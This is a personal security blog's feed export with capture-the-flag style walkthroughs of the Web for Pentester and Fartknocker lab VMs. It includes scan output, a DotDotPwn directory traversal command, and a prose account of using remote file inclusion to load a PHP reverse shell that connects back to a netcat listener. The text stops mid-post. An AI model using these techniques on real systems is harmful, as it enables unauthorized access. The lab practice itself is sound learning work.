tag:blogger.com,1999:blog-3011705218636827472024-03-05T16:51:14.466-08:00ContactL3ft's RandomnessRandom Gibberish from an Internet Hobo.Contactlefthttp://www.blogger.com/profile/03201194237594098458noreply@blogger.comBlogger6125tag:blogger.com,1999:blog-301170521863682747.post-46573435819407472020-05-22T08:01:00.000-07:002020-05-22T08:01:03.254-07:00SSH Poisoning via LFI<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpKpoDPbJ_nRvDzavPpB1WfFRqPIHcULfnUv_x-Xakb7pDx9Bu4ugI29b53qWNhgJspDa4vReVkSBQ03ns2STpiMRV7uA65ETr0j3ef-bN0XU3xoXx9vD4oEUcyle2huCdS5L2T99aaTA/s1600/DKhNl9fXoAAOSB2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="477" data-original-width="680" height="448" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpKpoDPbJ_nRvDzavPpB1WfFRqPIHcULfnUv_x-Xakb7pDx9Bu4ugI29b53qWNhgJspDa4vReVkSBQ03ns2STpiMRV7uA65ETr0j3ef-bN0XU3xoXx9vD4oEUcyle2huCdS5L2T99aaTA/s640/DKhNl9fXoAAOSB2.jpeg" width="640" /></a></div>
<br />Contactlefthttp://www.blogger.com/profile/03201194237594098458noreply@blogger.com0tag:blogger.com,1999:blog-301170521863682747.post-25867200849009424002015-05-30T12:10:00.001-07:002015-05-30T12:30:48.100-07:00Web for Pentester - File Inclusion<br />
There are two types of File inclusion<br />
<a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion" target="_blank">Local</a> and <a href="https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion" target="_blank">Remote</a><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqFy4VOh_YH2FIUwYMM3SV_JW79vdewpgXmsvz9_FIH7qambFE2fUpF-WaYCZt5hSvxgcaN_K36xuLKoNS9FHu8jf6MCr2ZrlyIZ6nlAGpDNT2D30-mrWqc9CvcjbvD12ZzhpJNG8ezfA/s1600/Screenshot+-+300515+-+20%253A09%253A10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqFy4VOh_YH2FIUwYMM3SV_JW79vdewpgXmsvz9_FIH7qambFE2fUpF-WaYCZt5hSvxgcaN_K36xuLKoNS9FHu8jf6MCr2ZrlyIZ6nlAGpDNT2D30-mrWqc9CvcjbvD12ZzhpJNG8ezfA/s400/Screenshot+-+300515+-+20%253A09%253A10.png" width="400" /></a></div>
<h4>
Example 1.</h4>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSJCTngel7Msd0bZsGaxSCE3bOPOS2tWbkhW5ph4dFS1HUSsymv6naiMSCnkla41DjFIzpMxePOktK4iVSIRrSg5KA83xRODtBUkqIs0hAx_3Ik7GEb6xBaV1NA5KKsWumdmqC6Cxp6aI/s1600/Screenshot+-+300515+-+20%253A14%253A54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSJCTngel7Msd0bZsGaxSCE3bOPOS2tWbkhW5ph4dFS1HUSsymv6naiMSCnkla41DjFIzpMxePOktK4iVSIRrSg5KA83xRODtBUkqIs0hAx_3Ik7GEb6xBaV1NA5KKsWumdmqC6Cxp6aI/s400/Screenshot+-+300515+-+20%253A14%253A54.png" width="400" /></a></div>
<br />
Below is an example of Local File Inclusion, Remote is also an option, however i will cover that in Example 2.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7YoIybaH6Hx8eyQMGM6L1bZ0DmaZiPe0RgJpAsDR-KRjDQz1w7KY82QqVkCOW_63YE9a2KouQ3SU5XDaqIsr9-lhs-nkCYUf9HrY2q6Q5CfjkWHKay7NZNyJ5i27EWvuRx9jwJp5wZ8E/s1600/Screenshot+-+300515+-+20%253A08%253A04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7YoIybaH6Hx8eyQMGM6L1bZ0DmaZiPe0RgJpAsDR-KRjDQz1w7KY82QqVkCOW_63YE9a2KouQ3SU5XDaqIsr9-lhs-nkCYUf9HrY2q6Q5CfjkWHKay7NZNyJ5i27EWvuRx9jwJp5wZ8E/s400/Screenshot+-+300515+-+20%253A08%253A04.png" width="400" /></a></div>
<br />
<br />
<br />
<h4>
Example 2.</h4>
<h4>
<br /></h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG0OAKpIahSZ2P1jkDt38PfwKg3Y2WijdF02eVTBTo6yuJ9vbxQ5u5sVwv26RTYQFDYNWQPME86cvX7TfCkcWYk2fnmnVIje3juEoB7UCZc5QhJxhoS8o-KcPwhj240aMx-S_HPHD3WAg/s1600/Screenshot+-+300515+-+20%253A19%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG0OAKpIahSZ2P1jkDt38PfwKg3Y2WijdF02eVTBTo6yuJ9vbxQ5u5sVwv26RTYQFDYNWQPME86cvX7TfCkcWYk2fnmnVIje3juEoB7UCZc5QhJxhoS8o-KcPwhj240aMx-S_HPHD3WAg/s400/Screenshot+-+300515+-+20%253A19%253A40.png" width="400" /></a></div>
<h4>
<br /></h4>
I decided to use a Pentest Monkey`s <a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell" target="_blank">php reverse shell </a><br />
<br />
after a quick edit, it was good to go.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS2d9-_IlHya_r9FUVHetOOHO02_l645bh4ByLFSSqYp82E8XIQ0bUx7Y-wxmA6b-0wQy7sYlbj6WqwUR_kLuLWHZt_t15rQcPSu3olO3_h6q6I9vUhVtmGuZncQXr5x2CjNCi8RHjiuI/s1600/Screenshot+-+300515+-+20%253A27%253A15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS2d9-_IlHya_r9FUVHetOOHO02_l645bh4ByLFSSqYp82E8XIQ0bUx7Y-wxmA6b-0wQy7sYlbj6WqwUR_kLuLWHZt_t15rQcPSu3olO3_h6q6I9vUhVtmGuZncQXr5x2CjNCi8RHjiuI/s320/Screenshot+-+300515+-+20%253A27%253A15.png" width="320" /></a></div>
<br />
<br />
I used <a href="http://effbot.org/librarybook/simplehttpserver.htm" target="_blank">pythons inbuilt simplehttpserver</a> hosting the script on my machine, and setup a simple netcat listener for it to connect back to.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_0-rtvAhFrm0pb2gkgHflmSnWoqyIcybbPCfxtMfdH7I-uUpntR2Uob9TUFCHu6XK2g01F7s9pJUnhW0IC4mefMyJE_v1H-bKAND-DymIVKtIWmMA6gOblH_9bYbKunEXS7k1nClHng8/s1600/Screenshot+-+160515+-+17%253A37%253A19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_0-rtvAhFrm0pb2gkgHflmSnWoqyIcybbPCfxtMfdH7I-uUpntR2Uob9TUFCHu6XK2g01F7s9pJUnhW0IC4mefMyJE_v1H-bKAND-DymIVKtIWmMA6gOblH_9bYbKunEXS7k1nClHng8/s400/Screenshot+-+160515+-+17%253A37%253A19.png" width="400" /></a></div>
<br />
<br />
Alas!<br />
<br />
Remote File Include, a php-reverse-shell which connected back to my netcat listener.<br />
<br />
I wont cover escalating, that is for another day.<br />
For now a foothold will suffice =)<br />
<br />
<br />
<br />
<br />
Thanks for reading.<br />
<br />Contactlefthttp://www.blogger.com/profile/03201194237594098458noreply@blogger.com0tag:blogger.com,1999:blog-301170521863682747.post-72055147985574751812015-05-30T11:09:00.001-07:002015-05-30T11:26:37.905-07:00Web for Pentester - Directory Traversal<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOK-iQdQ0wpomc5sHkEwXBLzjwnQkuU8W9hj1liXAOsH_GZ83h4dq23mbWU2IlxIHorJGsrYxen63vnI4TQhlkGM52k18BK5JLOms3XePQy-eNPYkkFGlhfdYcR5gWiiNry0RthfyBzuk/s1600/Screenshot+-+300515+-+19%253A10%253A14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOK-iQdQ0wpomc5sHkEwXBLzjwnQkuU8W9hj1liXAOsH_GZ83h4dq23mbWU2IlxIHorJGsrYxen63vnI4TQhlkGM52k18BK5JLOms3XePQy-eNPYkkFGlhfdYcR5gWiiNry0RthfyBzuk/s400/Screenshot+-+300515+-+19%253A10%253A14.png" width="400" /></a></div>
There are 3 Examples to complete.<br />
<br />
Viewing the Source shows these better.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglH83sGa1X9mdvZ5yJpMXxBWk99MxN7ZNECep5PNsBq7h2xKMyKg0Uzth79Swe5mWQqkrx__zxrpJD71_eWNfC2hQkVuPV2yGfcQwNpSkyP6mMXKjXurTl8zvqwXKUbQ0bx-Bcrrh1Al8/s1600/Screenshot+-+300515+-+19%253A12%253A01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglH83sGa1X9mdvZ5yJpMXxBWk99MxN7ZNECep5PNsBq7h2xKMyKg0Uzth79Swe5mWQqkrx__zxrpJD71_eWNfC2hQkVuPV2yGfcQwNpSkyP6mMXKjXurTl8zvqwXKUbQ0bx-Bcrrh1Al8/s400/Screenshot+-+300515+-+19%253A12%253A01.png" width="400" /></a> </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
1. No real issues.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy4noOkAQbQgxMJDs_2bhzfQiwYvZaTroZXj8V4AAntA1r2bZnMCjKkmYWRLuxxgDOHBTSeyjSYxzrvyC7xb1hTVOebuwv2Mv2onmVoPO-9RYFZnJhy6m47U0qOa0ird2EPdO3KVRtOB4/s1600/Screenshot+-+300515+-+11%253A43%253A47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy4noOkAQbQgxMJDs_2bhzfQiwYvZaTroZXj8V4AAntA1r2bZnMCjKkmYWRLuxxgDOHBTSeyjSYxzrvyC7xb1hTVOebuwv2Mv2onmVoPO-9RYFZnJhy6m47U0qOa0ird2EPdO3KVRtOB4/s400/Screenshot+-+300515+-+11%253A43%253A47.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. A different approach, as the first method didnt work.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf_GD7l_DC9DIwOJI7VnWarMKYCDcDzAhVL_Y6M1ntBdv-XOdhpqvFNhLdvLkCzPUXf32qTD1xFkqhafiKMmYbPZjYJSWlZBa5GUXEQExo125M-NE2AWxRYl1QCyuLYZmkHioKCp10nnk/s1600/Screenshot+-+300515+-+11%253A45%253A16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf_GD7l_DC9DIwOJI7VnWarMKYCDcDzAhVL_Y6M1ntBdv-XOdhpqvFNhLdvLkCzPUXf32qTD1xFkqhafiKMmYbPZjYJSWlZBa5GUXEQExo125M-NE2AWxRYl1QCyuLYZmkHioKCp10nnk/s400/Screenshot+-+300515+-+11%253A45%253A16.png" width="400" /> </a> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. This was much harder, after trying a few options, i decided to employ <a href="http://dotdotpwn.blogspot.co.uk/" target="_blank">DotDotPwn</a> to find it.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<i>perl dotdotpwn.pl -m http-url -h 192.168.56.101 -u http://192.168.56.101/dirtrav/example3.php?file=TRAVERSAL -o unix -b -k root</i></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguTFMBRTsLTHw1xAGxDHz9LVC0HK0ot4AFu0PZDS6OcjEENi6gZkeozgHEbCm_FC0esGDbv10WO87ki47Y5IZEIN_caTd4M5-b-VNP9vHl-2rqEJVEXnQ20OfFpZfnE6g4evnDQrrd4hI/s1600/Screenshot+-+300515+-+16%253A25%253A38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguTFMBRTsLTHw1xAGxDHz9LVC0HK0ot4AFu0PZDS6OcjEENi6gZkeozgHEbCm_FC0esGDbv10WO87ki47Y5IZEIN_caTd4M5-b-VNP9vHl-2rqEJVEXnQ20OfFpZfnE6g4evnDQrrd4hI/s400/Screenshot+-+300515+-+16%253A25%253A38.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Found! </div>
<div class="separator" style="clear: both; text-align: left;">
Now to test it in a browser.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbNuBH3kZWfkuyTMqTJjkKvXp1pqb1EtP3BT9ZZsbyaeMsIcrCbguRlpHTT4GqW44iAwd06nYQ5wCCACowo97jwGMAbkS6MXeEnQJJRGYc9DvGz8GYrx7OzgIYPWhNjm7-3qb-lQQmuPo/s1600/Screenshot+-+300515+-+16%253A26%253A22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbNuBH3kZWfkuyTMqTJjkKvXp1pqb1EtP3BT9ZZsbyaeMsIcrCbguRlpHTT4GqW44iAwd06nYQ5wCCACowo97jwGMAbkS6MXeEnQJJRGYc9DvGz8GYrx7OzgIYPWhNjm7-3qb-lQQmuPo/s400/Screenshot+-+300515+-+16%253A26%253A22.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Further Reading can be found here:</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://www.owasp.org/index.php/Path_Traversal" target="_blank">Owasp Path Traversal</a> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Thanks for reading.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Contactlefthttp://www.blogger.com/profile/03201194237594098458noreply@blogger.com0tag:blogger.com,1999:blog-301170521863682747.post-9572986832292537612015-05-30T11:05:00.002-07:002015-05-30T11:27:41.225-07:00Web for Pentester VM - Pentesterlab <h1 style="text-align: center;">
<span style="font-weight: normal;"><u>Web for Pentester </u></span></h1>
<h1>
</h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhdxZCeeWj_S8WJs2YYZE1BWQrfOrcApZU6-47PUhGhmuYW9vk7MH0lHo4eSF__OramuFoIpCnRuPjRz3_XUE3_Bp0CDhWfeGxw54OTV7jTLV1XlZm3y6KTJyhvz6dpKR1ANYzV4Oq8g/s1600/web_for_pentester.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhdxZCeeWj_S8WJs2YYZE1BWQrfOrcApZU6-47PUhGhmuYW9vk7MH0lHo4eSF__OramuFoIpCnRuPjRz3_XUE3_Bp0CDhWfeGxw54OTV7jTLV1XlZm3y6KTJyhvz6dpKR1ANYzV4Oq8g/s320/web_for_pentester.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRq7bjBKswhPHNxCfTMbWU5Nb7e0OA7B_iGV54sVW551TVphPE75MsbsUAMhEluqbzPWJYrntSQze-VRt5MnZ6TcCkAq8tykkbXxuDFMrG05dUzNg-5pcVqP_bgbtGw48MXyH7dDq5V7g/s1600/web_for_pentester_II.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<h1 style="text-align: center;">
<a href="https://pentesterlab.com/exercises/web_for_pentester/course" target="_blank">Pentesterlab Course</a></h1>
<h1 style="text-align: center;">
<a href="https://www.vulnhub.com/entry/pentester-lab-web-for-pentester,71/" target="_blank">VulnHub.com link </a></h1>
<h1 style="text-align: center;">
</h1>
<h1 style="text-align: left;">
This VM is a very nice collection of the different web vulnerabilities.</h1>
<h1 style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzHYcOY23AC4X3NCSRiigrJblU0L2JMF7OUiFzhYR-p920iHgDh7F45Mi05mthfIxi0UG6kCwsg1_Wvf1aCVSQruAsorXhVCrukr_nL4vMOOR7w0fE_WRijoL1mq8IvBOpeWg5WiMEDfY/s1600/Screenshot+-+300515+-+19%253A02%253A52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzHYcOY23AC4X3NCSRiigrJblU0L2JMF7OUiFzhYR-p920iHgDh7F45Mi05mthfIxi0UG6kCwsg1_Wvf1aCVSQruAsorXhVCrukr_nL4vMOOR7w0fE_WRijoL1mq8IvBOpeWg5WiMEDfY/s320/Screenshot+-+300515+-+19%253A02%253A52.png" width="320" /></a></div>
</h1>
<h1 style="text-align: left;">
The Pre-write up bit</h1>
<h1 style="text-align: left;">
Note: I dont do any of this for a living, and I dont claim to be all knowing.</h1>
<h1 style="text-align: left;">
</h1>
<h1 style="text-align: left;">
Any finding`s will be very brief, and sometimes incomplete.</h1>
<h1 style="text-align: left;">
</h1>
<h1 style="text-align: left;">
And of course, its gonna be back to front.</h1>
<h1 style="text-align: left;">
</h1>
<h1 style="text-align: left;">
I`ll decide on formatting it later on, but at the moment, i cant be bothered =)</h1>
<h1 style="text-align: left;">
</h1>
<h1 style="text-align: left;">
<a href="http://c0ntactl3ft.blogspot.co.uk/2015/05/web-for-pentester-directory-traversal.html" target="_blank">Directory Traversal</a> </h1>
<h1 style="text-align: left;">
</h1>
<h1 style="text-align: left;">
</h1>
<h1>
</h1>
Contactlefthttp://www.blogger.com/profile/03201194237594098458noreply@blogger.com0tag:blogger.com,1999:blog-301170521863682747.post-67979352777297155132015-05-07T12:17:00.002-07:002015-05-07T12:18:38.167-07:00<br />
<br />
<div style="text-align: center;">
A little picture I knocked up on a break from <a href="https://www.vulnhub.com/entry/darknet-10,120/" target="_blank">Darknet VM </a></div>
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaFgCAH1_jG8cP1v-6gk6QgbmWkH7xsnLIfqt79V___LSW4I0FJcUzK6lEPbEhiEdmf2ScU3d7G-LpXGviE1uMf6PsMs48VoFsxCy8_HLJXzUUvT60EBPHRyd9IdJf9BaTsols3hPuqpQ/s1600/tmp_17207-IMG_20150507_201631-502871758.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaFgCAH1_jG8cP1v-6gk6QgbmWkH7xsnLIfqt79V___LSW4I0FJcUzK6lEPbEhiEdmf2ScU3d7G-LpXGviE1uMf6PsMs48VoFsxCy8_HLJXzUUvT60EBPHRyd9IdJf9BaTsols3hPuqpQ/s320/tmp_17207-IMG_20150507_201631-502871758.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />Contactlefthttp://www.blogger.com/profile/03201194237594098458noreply@blogger.com0tag:blogger.com,1999:blog-301170521863682747.post-27209543872549949722015-04-16T14:09:00.001-07:002015-04-16T14:09:33.615-07:00TopHatSec - Fartknocker VM - Hosted on Vulnhub<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD2b8w3a-v_JmLVDspiS6DbUfelReNFOeHnbSOXql8WCzqlmeP4nWUXbMaXdRwQ3AUCTPfMcfSvqq2D_9Z_VZro5i6C8HSvoxV6ZeFTBwgB1V-wZeuhGalEhK0N8srnB9g2nPHCikLs9M/s1600/fartknocker+Screenshot+-+150415+-+23:50:03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD2b8w3a-v_JmLVDspiS6DbUfelReNFOeHnbSOXql8WCzqlmeP4nWUXbMaXdRwQ3AUCTPfMcfSvqq2D_9Z_VZro5i6C8HSvoxV6ZeFTBwgB1V-wZeuhGalEhK0N8srnB9g2nPHCikLs9M/s320/fartknocker+Screenshot+-+150415+-+23:50:03.png" /> </a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<span style="font-size: small;"><u><b>Discovery:</b></u></span><br />
<span style="font-size: small;"><br /></span>
<span style="color: #351c75; font-size: small;"><i> </i></span><br />
<span style="color: #351c75; font-size: small;"><i>arp gives:</i></span><span style="font-size: small;"> </span><br />
<span style="font-size: small;"><br /> </span><br />
<span style="font-size: small;">Address HWtype HWaddress Flags Mask Iface<br />192.168.56.102 ether 08:00:27:91:bc:58 C vboxnet0</span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><u><b> </b></u></span><br />
<br />
<span style="font-size: small;"><u><b>Scan: </b></u></span><br />
<br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Nmap 6.47 scan initiated Sat Apr 11 10:48:06 2015 as: nmap -sS -A -p- -oA fartknocker 192.168.56.102<br />Nmap scan report for 192.168.56.101<br />Host is up (0.0012s latency).<br />Not shown: 65534 closed ports<br />PORT STATE SERVICE VERSION<br />80/tcp open http Apache httpd 2.4.7 ((Ubuntu))<br />|_http-title: Site doesn't have a title (text/html).<br />MAC Address: 08:00:27:91:BC:58 (Cadmus Computer Systems)<br />Device type: general purpose<br />Running: Linux 3.X<br />OS CPE: cpe:/o:linux:linux_kernel:3<br />OS details: Linux 3.11 - 3.14<br />Network Distance: 1 hop<br /><br />TRACEROUTE<br />HOP RTT ADDRESS<br />1 1.18 ms 192.168.56.102<br /><br />OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br /># Nmap done at Sat Apr 11 10:48:23 2015 -- 1 IP address (1 host up) scanned in 17.77 seconds</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"></span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><i><span style="color: blue;"> </span></i></span><br />
<span style="font-size: small;"><i><span style="color: blue;">The scan shows a webserver running </span></i></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"></span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><u> </u></b></span><br />
<br />
<span style="font-size: small;"><b><u>Webscan:</u></b></span><br />
<span style="font-size: small;"><i><br /></i></span>
<span style="font-size: small;"><i>- Nikto v2.1.5/2.1.5<br />+ Target Host: 192.168.56.101<br />+ Target Port: 80<br />+ GET /: Server leaks inodes via ETags, header found with file /, fields: 0x68 0x5105a792cb1f8 <br />+ GET /: The anti-clickjacking X-Frame-Options header is not present.<br />+ OPTIONS /: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS <br />+ -3233: GET /icons/README: /icons/README: Apache default file found</i>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="color: blue; font-size: small;"><i> </i></span><br />
<br />
<span style="color: blue; font-size: small;"><i>Not much from that.......</i></span><br />
<span style="font-size: small;"><br /></span>
<span style="color: blue; font-size: small;"><i>So i decided to visit the page with a browser</i></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBwdfXGfnh-2xerSvz7Lp1xsev4bg7R7_s0DjDdOc1eGNePbfLcIL-jex09sdPxkgUG63AJnZaS_20AT7RJhgDu-UW9HWss6_4IDlnUYV6V0Gdn7-NQ_TydIrazfbjJzC4FYci1kQCIeU/s1600/First+Screenshot+-+150415+-+22:34:52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBwdfXGfnh-2xerSvz7Lp1xsev4bg7R7_s0DjDdOc1eGNePbfLcIL-jex09sdPxkgUG63AJnZaS_20AT7RJhgDu-UW9HWss6_4IDlnUYV6V0Gdn7-NQ_TydIrazfbjJzC4FYci1kQCIeU/s320/First+Screenshot+-+150415+-+22:34:52.png" height="106" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span>
<span style="font-size: small;"><i><span style="color: blue;">The link Wooah gives pcap1.pcap</span></i></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<i><span style="color: blue;"><span style="font-size: small;"><br /></span>
</span></i><br />
<i><span style="color: blue;">Opening it up with Wireshark, gives allot of ICMP flying back and fourth, however lower down something is happening</span></i>.<br />
<span style="background-color: #eeeeee;"><span style="color: blue;"><i></i></span></span><span style="background-color: blue; font-size: small;"><span style="background-color: #eeeeee;"><span style="color: blue;"><i></i></span></span></span><br />
<span style="background-color: blue; font-size: small;"><span style="background-color: #eeeeee;"><span style="color: blue;"><i></i></span></span></span><br />
<span style="background-color: blue; font-size: small;"><span style="background-color: #eeeeee;"><span style="color: blue;"><i></i></span></span></span>
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdt9g5V4cyhXkL7sZjY5CokR9y0-DSCpfw6LCXZzkxRjY573P6MpiO_ErG0Z_UUp2tsjRo9IX3jrkjry8Yz0uiVDTVEXlcpk1qIr9JVjVGb-6aqyJzgY-6ukcVuZQTXZGTLr2vrjuDuww/s1600/wireshark+Screenshot+-+150415+-+22:39:30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdt9g5V4cyhXkL7sZjY5CokR9y0-DSCpfw6LCXZzkxRjY573P6MpiO_ErG0Z_UUp2tsjRo9IX3jrkjry8Yz0uiVDTVEXlcpk1qIr9JVjVGb-6aqyJzgY-6ukcVuZQTXZGTLr2vrjuDuww/s320/wireshark+Screenshot+-+150415+-+22:39:30.png" height="178" width="400" /></a></span></div>
<span style="font-size: small;"></span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"><br /></span>
<span style="color: blue; font-size: small;"><i> </i></span><br />
<span style="color: blue; font-size: small;"><i>TCP Ports 7000, 8000, 9000 and 8888 are used.<br /> </i></span><br />
<span style="color: blue; font-size: small;"><i>I probed into this, knowing that knockd was a possibility (given there is a webserver running with no means of remote administration in place)<br /><br />Given my python abilities are... basic to say the least, i knocked up a simple bash script utilising netcat</i></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div style="text-align: justify;">
